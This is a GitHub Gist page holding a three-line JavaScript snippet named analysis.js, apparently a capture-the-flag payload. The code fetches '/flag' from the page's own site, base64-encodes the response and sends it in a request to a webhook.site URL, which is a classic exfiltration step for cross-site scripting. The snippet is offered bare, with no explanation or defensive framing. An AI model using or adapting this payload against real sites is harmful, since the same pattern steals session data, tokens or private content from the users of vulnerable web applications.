Skip to content

Instantly share code, notes, and snippets.

@JBoyDXB
JBoyDXB / analysis.js
Last active April 24, 2026 07:51
analysis.js
fetch("/flag")
.then(r => r.text())
.then(d => fetch("https://webhook.site/b3320dbf-1a7f-4e53-a706-51244a76c94b/?x=" + btoa(d)))